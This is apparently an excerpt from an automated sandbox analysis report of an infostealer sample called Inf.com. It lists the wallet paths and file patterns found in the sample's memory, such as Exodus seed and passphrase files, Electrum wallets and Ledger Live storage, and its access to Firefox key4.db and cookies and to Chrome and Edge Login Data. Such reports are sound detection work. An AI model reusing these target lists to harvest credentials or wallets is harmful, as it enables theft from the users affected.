                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.00000000001CD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
